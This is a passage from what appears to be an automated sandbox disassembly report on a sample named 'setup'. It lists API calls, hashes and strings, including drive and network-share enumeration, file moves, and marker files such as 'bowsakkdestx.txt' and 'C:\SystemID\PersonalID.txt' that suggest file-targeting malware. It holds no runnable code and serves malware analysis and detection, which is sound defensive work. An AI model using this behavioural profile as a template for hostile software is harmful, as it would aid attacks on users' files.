                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                • __mtinitlocks.LIBCMT ref: 00425146
                • __mtterm.LIBCMT ref: 0042514F
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                • __calloc_crt.LIBCMT ref: 00425174
                • __initptd.LIBCMT ref: 00425196
                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                • String ID:
                • API String ID: 3567560977-0
                • Opcode ID: ba76334793eead2fa168906c5bd492539b931eab390f8d8b833b1323b4595286
                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                • Opcode Fuzzy Hash: ba76334793eead2fa168906c5bd492539b931eab390f8d8b833b1323b4595286
                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                • Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
                • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                APIs
                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Window$CreateShowUpdate
                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                • API String ID: 2944774295-3503800400
                • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                APIs
                • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
                • _memset.LIBCMT ref: 00410C4C
                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocGlobalOpenResource_memset
                • String ID:
                • API String ID: 364255426-0
                • Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                • Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                APIs
                • GetLogicalDrives.KERNEL32 ref: 00410A75
                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                • String ID:
                • API String ID: 2560635915-0
                • Opcode ID: 7cf8edbb3770a5d083bc25f73fd5321533486d88e4d65188d7fea8f68b3245da
                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                • Opcode Fuzzy Hash: 7cf8edbb3770a5d083bc25f73fd5321533486d88e4d65188d7fea8f68b3245da
                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                APIs
                • _malloc.LIBCMT ref: 00423B64
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • std::exception::exception.LIBCMT ref: 00423B82
                • __CxxThrowException@8.LIBCMT ref: 00423B97
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                • String ID: bad allocation
                • API String ID: 3074076210-2104205924
                • Opcode ID: 77a038d866069de8405f1b4f337e78db008bb897c20f2d08f2dc211958e2afea
                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                • Opcode Fuzzy Hash: 77a038d866069de8405f1b4f337e78db008bb897c20f2d08f2dc211958e2afea
                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                • Opcode Fuzzy Hash: 4ae49f209f6475a8200da9094bd174a6e7cf262bc7a48cefe5d20c6bfdcbc766
                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleWritelstrlen
                • String ID:
                • API String ID: 1421093161-0
                • Opcode ID: 1448340e5504f70565a9a6c15d6da514673213274eacc8dd7078b0a9a5b36986
                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                • Opcode Fuzzy Hash: 1448340e5504f70565a9a6c15d6da514673213274eacc8dd7078b0a9a5b36986
                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277
                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                • TranslateMessage.USER32(?), ref: 0041B4CD
                • DispatchMessageW.USER32(?), ref: 0041B4D7
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                • String ID: %username%$I:\5d2860c89d774.jpg
                • API String ID: 441990211-897913220
                • Opcode ID: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                • Opcode Fuzzy Hash: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _fputws$CreateDirectory
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2590308727-54166481
                • Opcode ID: a8394b3a70a4d6a3136c362a99d12b854317469571ff5e0108eeca55942cb720
                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                • Opcode Fuzzy Hash: a8394b3a70a4d6a3136c362a99d12b854317469571ff5e0108eeca55942cb720
                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __flush__getptd_noexit__lock_file__write
                • String ID:
                • API String ID: 1331135983-0
                • Opcode ID: 35b811d88357f77a415146c2eb23ccc7e4c6579287969227049f292d1e69e1b3
                • Instruction ID: c258a73fbdc8133854d5e811ea952fba0687a612e98e888965f4ed88a5c8c031
                • Opcode Fuzzy Hash: 35b811d88357f77a415146c2eb23ccc7e4c6579287969227049f292d1e69e1b3
                • Instruction Fuzzy Hash: 3911C821712B305AD6245B75BC4276E3A909F41734F94834FE4758A1C3CB2CA542475D
                APIs
                • _malloc.LIBCMT ref: 0040EF69
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • _malloc.LIBCMT ref: 0040EF85
                • _memset.LIBCMT ref: 0040EF9B
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$AllocateHeap_memset
                • String ID:
                • API String ID: 3655941445-0
                • Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                • Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
                • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                • String ID:
                • API String ID: 2799698630-0
                • Opcode ID: 04f8e4852639ed9874bcb6494f28e578b9fe05bfc407fd48a7bf3bb55fd92765
                • Instruction ID: 5ab157793dcca273c0e587975c0a14bd2b460513ddb2d20d8000ed9fb441c990
                • Opcode Fuzzy Hash: 04f8e4852639ed9874bcb6494f28e578b9fe05bfc407fd48a7bf3bb55fd92765
                • Instruction Fuzzy Hash: 30519D70D00219DAEF20DF60DD457DEBBB5BF15308F4040BAD40A66291EB7A9AC9CF5A
                APIs
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __lock_file_memset
                • String ID:
                • API String ID: 26237723-0
                • Opcode ID: 445c070cf1acac955d9a39e82e15185871b6ddabc7e7101d962d1bf14f284458
                • Instruction ID: 3b27dc9081eeebfa63cadfeca7c4a7c62caa0de21db628116ac66ed60762724a
                • Opcode Fuzzy Hash: 445c070cf1acac955d9a39e82e15185871b6ddabc7e7101d962d1bf14f284458
                • Instruction Fuzzy Hash: 1B012831A00229FBCF21EFB6AD0189F7F61AF40364F84411BF82856191CB7C8662DF95
                APIs
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • __lock_file.LIBCMT ref: 00423A7D
                  • Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76
                • __fclose_nolock.LIBCMT ref: 00423A88
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                • Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
                • Opcode Fuzzy Hash: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                • Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59
                APIs
                • __lock_file.LIBCMT ref: 00423489
                • __ftell_nolock.LIBCMT ref: 00423494
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __ftell_nolock__getptd_noexit__lock_file
                • String ID:
                • API String ID: 2999321469-0
                • Opcode ID: a58877e3c81c978aac49b68a69ce6642370298b1df27fe6dc33e2a282af8e7c9
                • Instruction ID: 59e75a8078918f59343bfa35d7b516265fdda4ca888474ce23baf8c01a16d0b8
                • Opcode Fuzzy Hash: a58877e3c81c978aac49b68a69ce6642370298b1df27fe6dc33e2a282af8e7c9
                • Instruction Fuzzy Hash: F2F0A731B02634EAD711BFB6B80275E66B05F41339F91468FF020EB1C2CF7C8A425A69
                APIs
                • __lock.LIBCMT ref: 0042FB7B
                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                • __tzset_nolock.LIBCMT ref: 0042FB8E
                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                • String ID:
                • API String ID: 1282695788-0
                • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                APIs
                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00427B16,00000000,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,00000000,00000000), ref: 00427AE6
                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                • ExitProcess.KERNEL32 ref: 00427B1A
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess$AddressHandleModuleProc___crt
                • String ID:
                • API String ID: 2427264223-0
                • Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
                • Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
                • Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8
                APIs
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CloseFreeHandleVirtual
                • String ID:
                • API String ID: 2443081362-0
                • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
